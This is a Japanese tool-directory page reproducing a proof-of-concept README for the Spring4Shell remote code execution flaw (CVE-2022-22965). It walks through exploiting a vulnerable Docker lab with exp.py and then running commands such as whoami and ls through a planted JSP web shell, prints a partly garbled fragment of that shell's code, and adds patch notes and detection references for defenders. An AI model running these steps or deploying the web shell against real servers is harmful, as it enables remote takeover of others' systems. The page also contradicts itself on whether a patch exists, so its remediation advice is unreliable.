Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
ツール/GitHubGitHub/thegejr/springshell
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

リポジトリを見る
1318214年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Spring Core RCE - CVE-2022-22965

Spring Cloud に続き、3月29日にSpringのもう一つの重大な脆弱性がインターネット上で明らかになりました:Spring Core RCE

3月31日、Springはこの脆弱性を修正した新しいバージョンをリリースしました。セクションパッチ適用を参照してください。

3月31日、ついにCVE番号がこの脆弱性に割り当てられ、CVSSスコア9.8(CRITICAL)となりました。

概念実証

このエクスプロイトは非常に使いやすく、そのためCVSSスコアは9.8と非常に高くなっています。

脆弱性をテストするには、次の手順を実行します。

脆弱なSpringのDockerイメージを起動します。

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

これにより、脆弱なSpringがアドレス localhost:8082 にバインドされます。

curl でイメージが正しく起動したことを確認します。

root@kitploit:~
curl http://localhost:8082

ok という応答が返されるはずです。

では、脆弱なイメージをエクスプロイトしましょう!

root@kitploit:~
python3 exp.py --url http://localhost:8082

The vulnerability exists .... という応答が返されるはずです。

これで curl を使用して脆弱性をエクスプロイトできます。

root@kitploit:~
# コマンド whoami を実行
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# 応答は切り詰められています
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# コマンド ls を実行
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# 応答は切り詰められています
app
bin
dev
etc
..........

流通中のコード PoC

これまでにアップロードされたエクスプロイトは exp.py です。
流通中のコード PoC
厄介な状況

パッチ適用

SpringはこのCVEに対処する新しいバージョンをリリースしました。Springの発表を参照してください。

脆弱性を修正したコミット

脆弱性の影響

  1. JDKバージョン9以上
  2. Spring Frameworkまたは派生フレームワークを使用している

バグ修正の提案

現時点では、Springは公式パッチをリリースしていません。暫定的な対策として、JDKバージョンを下げることを推奨します。

ブルーチーム

Yara

  • Florian Roth - Spring4Shell ウェブシェル

Sigma

  • Emanuele De Lucia - .jspウェブシェルの作成

SPLUNK

  • Alex John - Splunk検出SPL
ツールをダウンロード